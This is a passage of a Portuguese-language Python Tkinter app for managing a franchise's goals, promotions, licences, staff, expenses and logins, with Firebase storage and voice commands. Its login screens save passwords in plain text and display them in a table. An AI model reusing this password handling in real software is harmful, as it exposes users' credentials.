2, width = 40)\r\n self.botaoremovermeta.place(x = 55, y = 225)\r\n \r\n def removermetatabela(self):\r\n del self.franquiaselecionada[\"Metas\"][self.nomermetaentry.get()]\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.janelarmetas.destroy()\r\n self.tablemetas.delete(*self.tablemetas.get_children())\r\n try:\r\n self.tablemetas.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Metas\"]:\r\n self.tablemetas.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Metas\"][i][\"inicio\"], self.franquiaselecionada[\"Metas\"][i][\"expiracao\"], self.franquiaselecionada[\"Metas\"][i][\"desc\"]), tags = (\"Cor\"))\r\n self.tablemetas.configure(height = len(self.tablemetas.get_children()))\r\n except:\r\n pass\r\n \r\n def voicebutton4(self):\r\n self.speak = wincl.Dispatch(\"SAPI.SpVoice\")\r\n self.r = sr.Recognizer()\r\n self.mic = sr.Microphone()\r\n\r\n\r\n with self.mic as source:\r\n self.audio = self.r.listen(source, phrase_time_limit = 2)\r\n print(self.r.recognize_google(self.audio, language = \"pt-BR\"))\r\n \r\n \r\n \r\n if self.r.recognize_google(self.audio, language = \"pt-BR\") == \"despesas\":\r\n try:\r\n self.selecionardespesas()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n \r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"funcionários\":\r\n try:\r\n self.selecionarfuncionarios()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"licenças\":\r\n try:\r\n self.selecionarlicencas()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"licençs\":\r\n try:\r\n self.selecionarlicencas()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"adicionar promoção\":\r\n try:\r\n self.adicionarpromocao()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"editar promoção\":\r\n try:\r\n self.editarpromocao()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"encerrar promoção\":\r\n try:\r\n self.removerpromocao()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"adicionar meta\":\r\n try:\r\n self.addmeta()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"editar meta\":\r\n try:\r\n self.editarmeta()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"remover meta\":\r\n try:\r\n self.removermeta()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"logins\":\r\n try:\r\n self.selecionarlogins()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n elif self.r.recognize_google(self.audio, language = \"pt-BR\") == \"login\":\r\n try:\r\n self.selecionarlogins()\r\n \r\n \r\n except:\r\n pass\r\n return\r\n \r\n else:\r\n \r\n self.speak.Speak(\"Desculpe, não entendi. Por favor, tente novamente!\")\r\n def adicionarpromocao(self):\r\n self.janelapromocao = tk.Toplevel()\r\n self.janelapromocao.wm_title(\"Adicionar Promoção\")\r\n self.janelapromocao.geometry(\"400x300\")\r\n self.janelapromocao.configure(bg = \"sandy brown\")\r\n self.nomepromocao = tk.Label(self.janelapromocao, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.iniciopromocao = tk.Label(self.janelapromocao, text = \"Data de início: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.finalpromocao = tk.Label(self.janelapromocao, text = \"Data de término: \", bg = \"sandy brown\", font = (\"verdana\", 9))\r\n self.descpromocao = tk.Label(self.janelapromocao, text = \"Descrição: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.finalpromocaoentry = tk.Entry(self.janelapromocao, bg = \"peru\")\r\n self.descpromocaoentry = tk.Entry(self.janelapromocao, bg = \"peru\")\r\n self.nomepromocaoentry = tk.Entry(self.janelapromocao, bg = \"peru\")\r\n self.iniciopromocaoentry = tk.Entry(self.janelapromocao, bg = \"peru\")\r\n self.nomepromocao.place(x = 50, y= 40)\r\n self.nomepromocaoentry.place(x = 190, y = 40)\r\n self.iniciopromocao.place(x = 50, y= 80)\r\n self.iniciopromocaoentry.place(x = 190, y = 80)\r\n self.finalpromocao.place(x = 50, y = 120)\r\n self.finalpromocaoentry.place(x = 190, y = 120)\r\n self.descpromocao.place(x = 50, y = 160)\r\n self.descpromocaoentry.place(x = 190, y = 160)\r\n self.botaoadicionarpromocao = tk.Button(self.janelapromocao, bg = \"peru\", fg = \"black\", text = \"Adicionar promoção\", command = self.inserirpromocao, height= 2, width = 40)\r\n self.botaoadicionarpromocao.place(x = 55, y = 225)\r\n \r\n\r\n def inserirpromocao(self):\r\n if len(self.janelapromocao.get_children()) < 12:\r\n self.tablepromocoes.insert(\"\", 1, \"\" , text = self.nomepromocaoentry.get(), values = (self.iniciopromocaoentry.get(), self.finalpromocaoentry.get(), self.descpromocaoentry.get()), tags = (\"Cor\"))\r\n self.tablepromocoes.tag_configure(\"Cor\", background = \"bisque2\")\r\n self.tablepromocoes.configure(height = len(self.tablepromocoes.get_children()))\r\n self.franquiaselecionada[\"Promocoes\"][self.nomepromocaoentry.get()]= {\"inicio\": self.iniciopromocaoentry.get(), \"expiracao\": self.finalpromocaoentry.get(), \"desc\": self.descpromocaoentry.get()}\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.janelapromocao.destroy()\r\n else:\r\n self.janelapromocao.destroy()\r\n self.errotabela()\r\n \r\n def editarpromocao(self):\r\n self.janelaeditarpromocao = tk.Toplevel()\r\n self.janelaeditarpromocao.wm_title(\"Editar Promoção\")\r\n self.janelaeditarpromocao.geometry(\"400x300\")\r\n self.janelaeditarpromocao.configure(bg = \"sandy brown\")\r\n self.nomepromocaoe = tk.Label(self.janelaeditarpromocao, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomepromocaoeentry = tk.Entry(self.janelaeditarpromocao, bg = \"peru\")\r\n self.nomepromocaoe.place(x = 50, y = 40)\r\n self.nomepromocaoeentry.place(x = 190, y = 40)\r\n self.bselecionarepromocao = tk.Button(self.janelaeditarpromocao, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Selecionar promoção\", command = self.editarpromocaoselecionada, height= 2, width = 20)\r\n self.bselecionarepromocao.place(x = 110, y = 100)\r\n \r\n def editarpromocaoselecionada(self):\r\n if self.nomepromocaoeentry.get() in self.franquiaselecionada[\"Promocoes\"]:\r\n self.nomepromocaoe.destroy()\r\n self.bselecionarepromocao.destroy()\r\n self.nomepromocaoee = tk.Label(self.janelaeditarpromocao, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\",10))\r\n self.nomepromocaoeeentry = tk.Entry(self.janelaeditarpromocao, bg = \"peru\")\r\n self.datapromocaoee = tk.Label(self.janelaeditarpromocao, text = \"Data de início: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.datapromocaoeeentry = tk.Entry(self.janelaeditarpromocao, bg = \"peru\")\r\n self.finalpromocaoee = tk.Label(self.janelaeditarpromocao, text = \"Data de término: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.finalpromocaoeeentry = tk.Entry(self.janelaeditarpromocao, bg = \"peru\")\r\n self.descricaopromocaoee = tk.Label(self.janelaeditarpromocao, text = \"Descrição: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.descricaopromocaoeeentry = tk.Entry(self.janelaeditarpromocao, bg = \"peru\")\r\n self.nomepromocaoee.place(x = 50, y = 40)\r\n self.nomepromocaoeeentry.place(x = 190, y = 40)\r\n self.datapromocaoee.place(x = 50, y = 70)\r\n self.datapromocaoeeentry.place(x = 190, y = 70)\r\n self.finalpromocaoee.place(x = 50, y = 100)\r\n self.finalpromocaoeeentry.place(x = 190, y = 100)\r\n self.descricaopromocaoee.place(x = 50, y = 130)\r\n self.descricaopromocaoeeentry.place(x = 190, y = 130)\r\n \r\n self.nomepromocaoeeentry.insert(0, self.nomepromocaoeentry.get())\r\n self.nomepromocaoeeentry.configure(state = \"disabled\")\r\n self.datapromocaoeeentry.insert(0, self.franquiaselecionada[\"Promocoes\"][self.nomepromocaoeeentry.get()][\"inicio\"])\r\n self.finalpromocaoeeentry.insert(0, self.franquiaselecionada[\"Promocoes\"][self.nomepromocaoeeentry.get()][\"expiracao\"])\r\n self.descricaopromocaoeeentry.insert(0, self.franquiaselecionada[\"Promocoes\"][self.nomepromocaoeeentry.get()][\"desc\"])\r\n self.binserirpromocaoeditada = tk.Button(self.janelaeditarpromocao, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Editar\", command = self.editarpromocaoselecionadainserida, height= 2, width = 20)\r\n self.bcancelarinserirpromocaoeditada = tk.Button(self.janelaeditarpromocao, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Cancelar\", command = self.cancelareditarpromocaoselecionada, height= 2, width = 20)\r\n self.bcancelarinserirpromocaoeditada.place(x=10, y= 250 )\r\n self.binserirpromocaoeditada.place(x =220, y = 250)\r\n else:\r\n self.janelaeditarpromocao.destroy()\r\n self.janelaerroedicao()\r\n \r\n def editarpromocaoselecionadainserida(self):\r\n self.franquiaselecionada[\"Promocoes\"][self.nomepromocaoeeentry.get()] = {\"inicio\": self.datapromocaoeeentry.get(), \"expiracao\": self.finalpromocaoeeentry.get(), \"desc\": self.descricaopromocaoeeentry.get()}\r\n firebase.patch(self.selecionada, self.franquiaselecionada) \r\n self.tablepromocoes.delete(*self.tablepromocoes.get_children())\r\n try:\r\n self.tablepromocoes.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Promocoes\"]:\r\n self.tablepromocoes.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Promocoes\"][i][\"inicio\"], self.franquiaselecionada[\"Promocoes\"][i][\"expiracao\"], self.franquiaselecionada[\"Promocoes\"][i][\"desc\"]), tags = (\"Cor\"))\r\n self.tablepromocoes.configure(height = len(self.tablepromocoes.get_children()))\r\n except:\r\n pass\r\n \r\n self.janelaeditarpromocao.destroy()\r\n \r\n def cancelareditarpromocaoselecionada(self):\r\n self.janelaeditarpromocao.destroy()\r\n def removerpromocao(self):\r\n self.janelarpromocoes = tk.Toplevel()\r\n self.janelarpromocoes.wm_title(\"Remover promoção\")\r\n self.janelarpromocoes.geometry(\"400x300\")\r\n self.janelarpromocoes.configure(bg = \"sandy brown\")\r\n self.nomepromocoesr = tk.Label(self.janelarpromocoes, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomepromocoesentryr = tk.Entry(self.janelarpromocoes, bg = \"peru\")\r\n self.nomepromocoesr.place(x = 50, y = 40)\r\n self.nomepromocoesentryr.place(x = 190, y = 40)\r\n self.bremoverpromocaoj = tk.Button(self.janelarpromocoes, bg = \"peru\", fg = \"black\", text = \"Encerrar promoção\", command = self.removerpromocaotabela, height= 2, width = 40)\r\n self.bremoverpromocaoj.place(x = 55, y = 225)\r\n \r\n def removerpromocaotabela(self):\r\n del self.franquiaselecionada[\"Promocoes\"][self.nomepromocoesentryr.get()]\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.janelarpromocoes.destroy()\r\n self.tablepromocoes.delete(*self.tablepromocoes.get_children())\r\n try:\r\n self.tablepromocoes.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Promocoes\"]:\r\n self.tablepromocoes.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Promocoes\"][i][\"inicio\"], self.franquiaselecionada[\"Promocoes\"][i][\"expiracao\"], self.franquiaselecionada[\"Promocoes\"][i][\"desc\"]), tags = (\"Cor\"))\r\n self.tablepromocoes.configure(height = len(self.tablepromocoes.get_children()))\r\n except:\r\n pass\r\n \r\n def selecionarlogins(self):\r\n self.janelalogins = tk.Toplevel()\r\n self.janelalogins.wm_title(\"Logins\")\r\n self.janelalogins.geometry(\"800x600\")\r\n self.janelalogins.configure(bg = \"sandy brown\")\r\n self.titulologins = tk.Label(self.janelalogins, text = \"Lista de logins: \", font = (\"Verdana\", 20), bg = \"sandy brown\")\r\n self.titulologins.place(x = 20, y = 20)\r\n self.tablelogins = ttk.Treeview(self.janelalogins, columns=(\"senha\", \"data\"))\r\n self.tablelogins.configure(height = 0)\r\n \r\n \r\n self.tablelogins.heading(\"#0\", text = \"Usuário\")\r\n self.tablelogins.heading(\"#1\", text = \"Senha\")\r\n self.tablelogins.heading(\"#2\", text = \"Data de criação\")\r\n \r\n self.tablelogins.column(\"#0\", anchor = \"center\", width = 300)\r\n self.tablelogins.column(\"#1\", anchor = \"center\", width = 300)\r\n self.tablelogins.column(\"#2\", anchor = \"center\", width = 150)\r\n self.tablelogins.place(x = 20, y = 75)\r\n \r\n self.badddlogin = tk.Button(self.janelalogins, bg = \"peru\", fg = \"black\", text = \"Adicionar login\", command = self.adicionarlogin, height= 2, width = 40)\r\n self.bremoverlogin = tk.Button(self.janelalogins, bg = \"peru\", fg = \"black\", text = \"Remover llgin\", command = self.removerlogin, height= 2, width = 40)\r\n self.badddlogin.place(x = 250, y = 500)\r\n self.bremoverlogin.place(x = 250, y = 550)\r\n \r\n try: \r\n self.tablelogins.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.logins[\"Acesso\"]:\r\n self.tablelogins.insert(\"\", 1, \"\" , text = i, values = (self.logins[\"Acesso\"][i][\"senha\"], self.logins[\"Acesso\"][i][\"data\"]), tags = (\"Cor\"))\r\n self.tablelogins.configure(height = len(self.tablelogins.get_children()))\r\n except:\r\n pass\r\n \r\n \r\n def adicionarlogin(self):\r\n self.janelaaddlogin = tk.Toplevel()\r\n self.janelaaddlogin.wm_title(\"Adicionar login\")\r\n self.janelaaddlogin.geometry(\"400x300\")\r\n self.janelaaddlogin.configure(bg = \"sandy brown\")\r\n self.nomelogin = tk.Label(self.janelaaddlogin, text = \"Usuário: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.senhalogin = tk.Label(self.janelaaddlogin, text = \"Senha: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomeloginentry = tk.Entry(self.janelaaddlogin, bg = \"peru\")\r\n self.senhaloginentry = tk.Entry(self.janelaaddlogin, bg = \"peru\", show= \"*\")\r\n self.nomelogin.place(x = 50, y= 40)\r\n self.nomeloginentry.place(x = 190, y = 40)\r\n self.senhalogin.place(x = 50, y= 80)\r\n self.senhaloginentry.place(x = 190, y = 80)\r\n self.botaoadicionarlogin = tk.Button(self.janelaaddlogin, bg = \"peru\", fg = \"black\", text = \"Adicionar login\", command = self.inserirlogin, height= 2, width = 40)\r\n self.botaoadicionarlogin.place(x = 55, y = 225)\r\n \r\n\r\n def removerlogin(self):\r\n self.janelarlogin = tk.Toplevel()\r\n self.janelarlogin.wm_title(\"Remover login\")\r\n self.janelarlogin.geometry(\"400x300\")\r\n self.janelarlogin.configure(bg = \"sandy brown\")\r\n self.nomerlogin = tk.Label(self.janelarlogin, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomerloginentry = tk.Entry(self.janelarlogin, bg = \"peru\")\r\n self.nomerlogin.place(x = 50, y = 40)\r\n self.nomerloginentry.place(x = 190, y = 40)\r\n self.bremoverlogin = tk.Button(self.janelarlogin, bg = \"peru\", fg = \"black\", text = \"Remover login\", command = self.removerlogintabela, height= 2, width = 40)\r\n self.bremoverlogin.place(x = 55, y = 225)\r\n \r\n def removerlogintabela(self):\r\n del self.logins[\"Acesso\"][self.nomerloginentry.get()]\r\n firebase.patch(\"\", self.logins)\r\n self.janelarlogin.destroy()\r\n self.tablelogins.delete(*self.tablelogins.get_children())\r\n try: \r\n self.tablelogins.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.logins[\"Acesso\"]:\r\n self.tablelogins.insert(\"\", 1, \"\" , text = i, values = (self.logins[\"Acesso\"][i][\"senha\"], self.logins[\"Acesso\"][i][\"data\"]), tags = (\"Cor\"))\r\n self.tablelogins.configure(height = len(self.tablelogins.get_children()))\r\n except:\r\n pass\r\n \r\n def inserirlogin(self):\r\n self.tablelogins.insert(\"\", 1, \"\" , text = self.nomeloginentry.get(), values = (self.senhaloginentry.get(), str(self.datadehoje.strftime(\"%Y-%m-%d %H:%M\"))), tags = (\"Cor\"))\r\n self.tablelogins.tag_configure(\"Cor\", background = \"bisque2\")\r\n self.tablelogins.configure(height = len(self.tablelogins.get_children()))\r\n self.logins[\"Acesso\"][self.nomeloginentry.get()]= {\"senha\": self.senhaloginentry.get(), \"data\": str(self.datadehoje.strftime(\"%Y-%m-%d %H:%M\"))}\r\n firebase.patch(\"\", self.logins)\r\n self.janelaaddlogin.destroy()\r\n \r\n def selecionarlicencas(self):\r\n self.janelalicense = tk.Toplevel()\r\n self.janelalicense.wm_title(\"Licenças\")\r\n self.janelalicense.geometry(\"800x600\")\r\n self.janelalicense.configure(bg = \"sandy brown\")\r\n self.titulolicense = tk.Label(self.janelalicense, text = \"Lista de Licenças da empresa: \", font = (\"Verdana\", 20), bg = \"sandy brown\")\r\n self.titulolicense.place(x = 20, y = 20)\r\n self.tablelicense = ttk.Treeview(self.janelalicense, columns=(\"início\", \"expiração\", \"descrição\"))\r\n self.tablelicense.configure(height = 0)\r\n \r\n \r\n self.tablelicense.heading(\"#0\", text = \"Nome\")\r\n self.tablelicense.heading(\"#1\", text = \"Adquirida em:\")\r\n self.tablelicense.heading(\"#2\", text = \"Expira em:\")\r\n self.tablelicense.heading(\"#3\", text = \"Descrição\")\r\n self.tablelicense.column(\"#0\", anchor = \"center\", width = 120)\r\n self.tablelicense.column(\"#1\", anchor = \"center\", width = 90)\r\n self.tablelicense.column(\"#2\", anchor = \"center\", width = 90)\r\n self.tablelicense.column(\"#3\", anchor = \"center\", width = 450)\r\n self.tablelicense.place(x = 20, y = 75)\r\n self.badddlicense = tk.Button(self.janelalicense, bg = \"peru\", fg = \"black\", text = \"Adicionar licença\", command = self.adicionarlicense, height= 2, width = 40)\r\n self.bremoverlicense = tk.Button(self.janelalicense, bg = \"peru\", fg = \"black\", text = \"Remover licença\", command = self.removerlicense, height= 2, width = 40)\r\n self.badddlicense.place(x = 250, y = 500)\r\n self.bremoverlicense.place(x = 250, y = 550)\r\n \r\n try: \r\n self.tablelicense.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Licenças\"]:\r\n self.tablelicense.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Licenças\"][i][\"inicio\"], self.franquiaselecionada[\"Licenças\"][i][\"expiracao\"], self.franquiaselecionada[\"Licenças\"][i][\"desc\"]), tags = (\"Cor\"))\r\n self.tablelicense.configure(height = len(self.tablelicense.get_children()))\r\n except:\r\n pass\r\n \r\n def adicionarlicense(self):\r\n self.janelaaddlicense = tk.Toplevel()\r\n self.janelaaddlicense.wm_title(\"Adicionar despesa\")\r\n self.janelaaddlicense.geometry(\"400x300\")\r\n self.janelaaddlicense.configure(bg = \"sandy brown\")\r\n self.nomelicense = tk.Label(self.janelaaddlicense, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.datailicense = tk.Label(self.janelaaddlicense, text = \"Adquirida em: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.dataexplicense = tk.Label(self.janelaaddlicense, text = \"Expira em: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.descricaolicense = tk.Label(self.janelaaddlicense, text = \"Descrição: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n\r\n self.nomelicenseentry = tk.Entry(self.janelaaddlicense, bg = \"peru\")\r\n self.datailicenseentry = tk.Entry(self.janelaaddlicense, bg = \"peru\")\r\n self.dataexplicenseentry = tk.Entry(self.janelaaddlicense, bg = \"peru\")\r\n self.descricaolicenseentry = tk.Entry(self.janelaaddlicense, bg = \"peru\")\r\n self.nomelicense.place(x = 50, y= 40)\r\n self.nomelicenseentry.place(x = 190, y = 40)\r\n self.datailicense.place(x = 50, y= 80)\r\n self.datailicenseentry.place(x = 190, y = 80)\r\n self.dataexplicense.place(x = 50, y= 120)\r\n self.dataexplicenseentry.place(x = 190, y = 120)\r\n self.descricaolicense.place(x = 50, y = 160)\r\n self.descricaolicenseentry.place(x = 190, y = 160)\r\n self.botaoadicionarlicense = tk.Button(self.janelaaddlicense, bg = \"peru\", fg = \"black\", text = \"Adicionar licença\", command = self.inserirlicense, height= 2, width = 40)\r\n self.botaoadicionarlicense.place(x = 55, y = 225)\r\n \r\n def inserirlicense(self):\r\n self.tablelicense.insert(\"\", 1, \"\" , text = self.nomelicenseentry.get(), values = (self.datailicenseentry.get(), self.dataexplicenseentry.get(), self.descricaolicenseentry.get()), tags = (\"Cor\"))\r\n self.tablelicense.tag_configure(\"Cor\", background = \"bisque2\")\r\n self.tablelicense.configure(height = len(self.tablelicense.get_children()))\r\n self.franquiaselecionada[\"Licenças\"][self.nomelicenseentry.get()]= {\"inicio\": self.datailicenseentry.get(), \"expiracao\": self.dataexplicenseentry.get(), \"desc\": self.descricaolicenseentry.get()}\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.janelaaddlicense.destroy()\r\n \r\n def removerlicense(self):\r\n self.janelarlicense = tk.Toplevel()\r\n self.janelarlicense.wm_title(\"Remover despesa\")\r\n self.janelarlicense.geometry(\"400x300\")\r\n self.janelarlicense.configure(bg = \"sandy brown\")\r\n self.nomelicenser = tk.Label(self.janelarlicense, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomelicenserentry = tk.Entry(self.janelarlicense, bg = \"peru\")\r\n self.nomelicenser.place(x = 50, y = 40)\r\n self.nomelicenserentry.place(x = 190, y = 40)\r\n self.bremoverlicenser = tk.Button(self.janelarlicense, bg = \"peru\", fg = \"black\", text = \"Remover licença\", command = self.removerlicensetabela, height= 2, width = 40)\r\n self.bremoverlicenser.place(x = 55, y = 225)\r\n \r\n def removerlicensetabela(self):\r\n del self.franquiaselecionada[\"Licenças\"][self.nomelicenserentry.get()]\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.janelarlicense.destroy()\r\n self.tablelicense.delete(*self.tablelicense.get_children())\r\n try: \r\n self.tablelicense.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Licenças\"]:\r\n self.tablelicense.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Licenças\"][i][\"inicio\"], self.franquiaselecionada[\"Licenças\"][i][\"expiracao\"], self.franquiaselecionada[\"Licenças\"][i][\"desc\"]), tags = (\"Cor\"))\r\n self.tablelicense.configure(height = len(self.tablelicense.get_children()))\r\n except:\r\n pass\r\n \r\n \r\n \r\n def selecionarfuncionarios(self):\r\n self.janelafuncionarios = tk.Toplevel()\r\n self.janelafuncionarios.wm_title(\"Funcionários\")\r\n self.janelafuncionarios.geometry(\"800x600\")\r\n self.janelafuncionarios.configure(bg = \"sandy brown\")\r\n self.titulofuncionarios = tk.Label(self.janelafuncionarios, text = \"Lista de Funcionários: \", font = (\"Verdana\", 20), bg = \"sandy brown\")\r\n self.titulofuncionarios.place(x = 20, y = 20)\r\n \r\n \r\n self.tablefuncionarios = ttk.Treeview(self.janelafuncionarios, columns=(\"idade\", \"cpf\", \"salario\", \"cargo\", \"data\"))\r\n self.tablefuncionarios.configure(height = 0)\r\n \r\n self.tablefuncionarios.heading(\"#0\", text = \"Nome\")\r\n self.tablefuncionarios.heading(\"#1\", text = \"Idade\")\r\n self.tablefuncionarios.heading(\"#2\", text = \"CPF\")\r\n self.tablefuncionarios.heading(\"#3\", text = \"Salário\")\r\n self.tablefuncionarios.heading(\"#4\", text = \"Função\")\r\n self.tablefuncionarios.heading(\"#5\", text = \"Data de Início\")\r\n \r\n self.tablefuncionarios.column(\"#0\", anchor = \"center\", width = 150)\r\n self.tablefuncionarios.column(\"#1\", anchor = \"center\", width = 90)\r\n self.tablefuncionarios.column(\"#2\", anchor = \"center\", width = 120)\r\n self.tablefuncionarios.column(\"#3\", anchor = \"center\", width = 90)\r\n self.tablefuncionarios.column(\"#4\", anchor = \"center\", width = 90) \r\n self.tablefuncionarios.column(\"#5\", anchor = \"center\", width = 90)\r\n self.tablefuncionarios.place(x = 20, y = 75)\r\n \r\n self.baddfuncionario = tk.Button(self.janelafuncionarios, bg = \"peru\", fg = \"black\", text = \"Adicionar funcionário\", command = self.adicionarfuncionario, height= 2, width = 40)\r\n self.bremoverfuncionario = tk.Button(self.janelafuncionarios, bg = \"peru\", fg = \"black\", text = \"Remover funcionário\", command = self.removerfuncionario, height= 2, width = 40)\r\n self.baddfuncionario.place(x = 250, y = 500)\r\n self.bremoverfuncionario.place(x = 250, y = 550)\r\n \r\n try:\r\n self.tablefuncionarios.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Funcionarios\"]:\r\n self.tablefuncionarios.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Funcionarios\"][i][\"idade\"], self.franquiaselecionada[\"Funcionarios\"][i][\"cpf\"], self.franquiaselecionada[\"Funcionarios\"][i][\"salario\"], self.franquiaselecionada[\"Funcionarios\"][i][\"funcao\"], self.franquiaselecionada[\"Funcionarios\"][i][\"data\"]), tags = (\"Cor\"))\r\n self.tablefuncionarios.configure(height = len(self.tablefuncionarios.get_children()))\r\n except:\r\n pass\r\n \r\n def selecionardespesas(self):\r\n self.janelad = tk.Toplevel()\r\n self.janelad.wm_title(\"Despesas\")\r\n self.janelad.geometry(\"800x600\")\r\n self.janelad.configure(bg = \"sandy brown\")\r\n self.titulodespesas = tk.Label(self.janelad, text = \"Lista de Despesas: \", font = (\"Verdana\", 20), bg = \"sandy brown\")\r\n self.titulodespesas.place(x = 20, y = 20)\r\n self.tabledespesas = ttk.Treeview(self.janelad, columns=(\"valor\", \"descricao\"))\r\n self.tabledespesas.configure(height = 0)\r\n \r\n self.tabledespesas.heading(\"#0\", text = \"Nome\")\r\n self.tabledespesas.heading(\"#1\", text = \"Valor\")\r\n self.tabledespesas.heading(\"#2\", text = \"Descrição\")\r\n self.tabledespesas.column(\"#0\", anchor = \"center\", width = 150)\r\n self.tabledespesas.column(\"#1\", anchor = \"center\", width = 120)\r\n self.tabledespesas.column(\"#2\", anchor = \"center\", width = 500)\r\n self.tabledespesas.place(x = 20, y = 75)\r\n \r\n self.badddespesa = tk.Button(self.janelad, bg = \"peru\", fg = \"black\", text = \"Adicionar despesa\", command = self.adicionardespesa, height= 2, width = 40)\r\n self.bremoverdespesa = tk.Button(self.janelad, bg = \"peru\", fg = \"black\", text = \"Remover despesa\", command = self.removerdespesa, height= 2, width = 40)\r\n self.badddespesa.place(x = 250, y = 500)\r\n self.bremoverdespesa.place(x = 250, y = 550)\r\n try:\r\n self.tabledespesas.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Despesas\"]:\r\n self.tabledespesas.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Despesas\"][i][\"valor\"], self.franquiaselecionada[\"Despesas\"][i][\"desc\"]), tags = (\"Cor\"))\r\n self.tabledespesas.configure(height = len(self.tabledespesas.get_children()))\r\n except:\r\n pass\r\n def adicionardespesa(self):\r\n self.janelaadddespesa = tk.Toplevel()\r\n self.janelaadddespesa.wm_title(\"Adicionar despesa\")\r\n self.janelaadddespesa.geometry(\"400x300\")\r\n self.janelaadddespesa.configure(bg = \"sandy brown\")\r\n self.nomedespesa = tk.Label(self.janelaadddespesa, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.valordespesa = tk.Label(self.janelaadddespesa, text = \"Valor: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.descricaodespesa = tk.Label(self.janelaadddespesa, text = \"Descrição: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomedespesaentry = tk.Entry(self.janelaadddespesa, bg = \"peru\")\r\n self.valordespesaentry = tk.Entry(self.janelaadddespesa, bg = \"peru\")\r\n self.descricaodespesaentry = tk.Entry(self.janelaadddespesa, bg = \"peru\")\r\n self.nomedespesa.place(x = 50, y= 40)\r\n self.nomedespesaentry.place(x = 190, y = 40)\r\n self.valordespesa.place(x = 50, y= 80)\r\n self.valordespesaentry.place(x = 190, y = 80)\r\n self.descricaodespesa.place(x = 50, y= 120)\r\n self.descricaodespesaentry.place(x = 190, y = 120)\r\n self.botaoadicionardespesa = tk.Button(self.janelaadddespesa, bg = \"peru\", fg = \"black\", text = \"Adicionar despesa\", command = self.inserirdespesa, height= 2, width = 40)\r\n self.botaoadicionardespesa.place(x = 55, y = 225)\r\n \r\n \r\n def inserirdespesa(self):\r\n self.tabledespesas.insert(\"\", 1, \"\" , text = self.nomedespesaentry.get(), values = (self.valordespesaentry.get(), self.descricaodespesaentry.get()), tags = (\"Cor\"))\r\n self.tabledespesas.tag_configure(\"Cor\", background = \"bisque2\")\r\n self.tabledespesas.configure(height = len(self.tabledespesas.get_children()))\r\n self.franquiaselecionada[\"Despesas\"][self.nomedespesaentry.get()]= {\"valor\": self.valordespesaentry.get(), \"desc\": self.descricaodespesaentry.get()}\r\n self.franquiaselecionada[\"Dados\"][\"NDespesas\"] += int(self.valordespesaentry.get())\r\n firebase.patch(self.selecionada, 